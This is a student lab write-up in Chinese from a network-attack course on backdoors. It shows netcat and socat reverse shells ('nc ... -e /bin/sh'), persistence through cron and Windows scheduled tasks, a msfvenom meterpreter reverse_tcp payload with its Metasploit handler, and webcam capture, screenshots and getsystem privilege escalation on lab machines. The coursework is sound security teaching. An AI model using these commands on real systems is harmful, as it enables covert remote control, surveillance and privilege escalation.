20164310Exp2后门原理与实践

时间:2022-02-18 18:30:52

一、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式

答:在莫名其妙的网站下载某些莫名奇妙的播放器。

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:对于windows是双击后门软件执行。对于linux,通过cron指令。

3.Meterpreter有哪些给你映像深刻的功能?

答:截屏功能,录音功能,调用摄像头的功能。

4.如何发现自己有系统有没有被安装后门?

答:使用某管家查杀一下就好。

二、使用netcat获取主机操作Shell,cron启动

1.windows获得linux的权限

(1)查阅本机windows ip地址

20164310Exp2后门原理与实践

可知win的ip为192.168.1.157

(2)使用以下代码ncat.exe -l -p 4310 监听4310端口,等着linux链接这个端口

(3)使用命令 nc 192.168.1.157 4310 -e /bin/sh 让linux链接4310端口  

(4)windows获得linux的shell

20164310Exp2后门原理与实践

2.linux获得windows的权限

(1)查阅本机linux ip地址

20164310Exp2后门原理与实践

(2)nc设置监听本地4310端口 nc -l -p 4310

(3)让windows去链接linux的4310端口

20164310Exp2后门原理与实践

(4)linux获得windows的权限

20164310Exp2后门原理与实践

3.nc数据传输

(1)windows监听本地4310端口 ncat.exe -l 4310  linux连接这个端口 nc 192.168.28.157 4310

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

4.nc定时启动

(1)windows监听本地4310端口 ncat.exe -l -p 4310

(2)crontab指令增加一条定时任务,让他在每小时的第54分钟执行 crontab -e 。

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

三、使用socat获取主机操作Shell, 任务计划启动

(1)按照步骤创建一个新任务,控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称ZHYY,之后,新建触发器,选择开始任务时间为:工作站锁定时。

20164310Exp2后门原理与实践

(2)创建完成之后,按 Win+L 快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行(可能会有很多同学出现一个黑屏,这里不用管它)

(3)在终端输入指令 socat - tcp:192.168.1.157:4310  此时可发现已经成功获得了一个windows shell

20164310Exp2后门原理与实践

四、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.用以下代码生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=43101 -f exe > 007_backdoor.exe

20164310Exp2后门原理与实践

2.通过nc指令将生成的后门程序传送到Windows主机上,输入后需要在Linux上输入指令ncat -nv

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

20164310Exp2后门原理与实践

可以在C盘中看到该后门

20164310Exp2后门原理与实践

3.在kali上使用 msfconsole 指令进入msf控制台,然后出现了下面这个奇怪的东西

20164310Exp2后门原理与实践

4.配置参数攻击windows,这里需要把防火墙和杀毒软件全部关掉

(1)先按照以下代码进行配置

use exploit/multi/handler             

set payload windows/meterpreter/reverse_tcp   

show options                    

set LHOST 192.168.31.128              

set LPORT                     

show options                    

exploit                      

发现端口是4444

20164310Exp2后门原理与实践

(2)设置模块、载荷

20164310Exp2后门原理与实践

(3)再次设置主机IP、端口,并再次用 show options 查看是否设置正确,发现设置正确

20164310Exp2后门原理与实践

(4)启用模块

20164310Exp2后门原理与实践

(5)在windows上运行后门程序,并在linux上查看,发现得到了windows远程控制权

20164310Exp2后门原理与实践

五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.直接输入命令 screenshot 进行截屏,发现截屏记录在root下

20164310Exp2后门原理与实践

2.使用命令webcam_snap进行控制摄像头

20164310Exp2后门原理与实践

3.进行提权

(1)先使用 先使用 getuid 再使用 用 getsystem 指令进行提权

20164310Exp2后门原理与实践

(2)以管理员身份运行后门程序

(3)提权成功

20164310Exp2后门原理与实践

六、实验感想

通过本次实验了解了后门植入原理和如何通过后门去控制其他主机,原理比较简单,也可以想得明白,因为是原理所以和实际操作会有偏差,因为被攻击的电脑有杀软和防火墙,不可能这么容易就被植入后门程序。与此同时也学到了控制权限之后能对受害主机进行的一系列操作,其中印象最深刻的就是控制截屏功能和摄像头的权限,希望在之后的课程中能够进一步地学习后门植入程序,也就是如何才能让后门程序逃过杀毒软件的查杀,或许这是计算机病毒里才可能讲到的内容了。

20164310Exp2后门原理与实践的更多相关文章

  1. 20165223《网络对抗技术》Exp2 后门原理与实践

    目录 -- 后门原理与实践 后门原理与实践说明 实验任务 基础知识问答 常用后门工具 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shel ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  4. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践

    实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...

  6. 20165221 《网络对抗技术》EXP2:后门原理与实践

    20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. 转载:Chrome调试折腾记&lowbar;&lpar;1&rpar;调试控制中心快捷键详解&excl;&excl;&excl;

    转载:http://blog.csdn.net/crper/article/details/48098625 大多浏览器的调试功能的启用快捷键都一致…按下F12;还是熟悉的味道;  或者直接 Ctrl ...

  2. ubuntu 12&period;04安装jdk1&period;8

    转自http://blog.chinaunix.net/uid-26404477-id-3471246.html 在安装之前,系统没有任何jdk软件,也就是说在终端执行 java -version 将 ...

  3. python--str的几个方法

    str.format()  :对应取值 name="chenshan" age=30 address="宜山路926号新思大厦15楼" print " ...

  4. openssl安装

    www.openssl.orgconfigure the environment:<pre lang="bash" escaped="true">t ...

  5. ASP&period;NET获取上传图片的大小

    1.采用客户端javascript可以取得图片大小 <input id="FileUpload" type="file" size="30&qu ...

  6. TOMCAT启动完成但是ECLIPSE仍然显示starting&period;&period;&period;&period;

    最近重新部署了一个TOMCAT服务,但是启动碰到个问题,虽然TOMCAT控制台已显示启动成功,但是ECLIPSE右下角仍然一直显示STARTING,最后TOMCAT超时,启动失败. 之前以为是拷贝工程 ...

  7. web前端代码规范 - HTML代码规范

    Bootstrap HTML编码规范 本文转载自w3cschool. 由于bootstrap得到了世界的认可,因此,此规范用于规范html代码有一定的说服力. 交流qq群:164858883.欢迎各位 ...

  8. ②jquery复习

    # jQuery 复习--by 传智前端与移动开发学院 ## 1. jQuery是什么?(了解)+ www.github.com+ jQuery 其实就是一堆的js函数,是普通的js,只不过应用广泛, ...

  9. angular2 学习笔记 &lpar; angular cli &amp&semi; npm version manage npm 版本管理 &rpar;

    更新 : 2017-05-05 现在流行 Yarn ! 它是 facebook google 推出的东西. 算是补助 npm 做的不够好的地方. 源码依然是发布去 npm,只是下载接口换掉罢了哦. n ...

  10. linux命令详解之df命令

    df命令概述df命令作用是列出文件系统的整体磁盘空间使用情况.可以用来查看磁盘已被使用多少空间和还剩余多少空间. df命令显示系统中包含每个文件名参数的磁盘使用情况,如果没有文件名参数,则显示所有当前 ...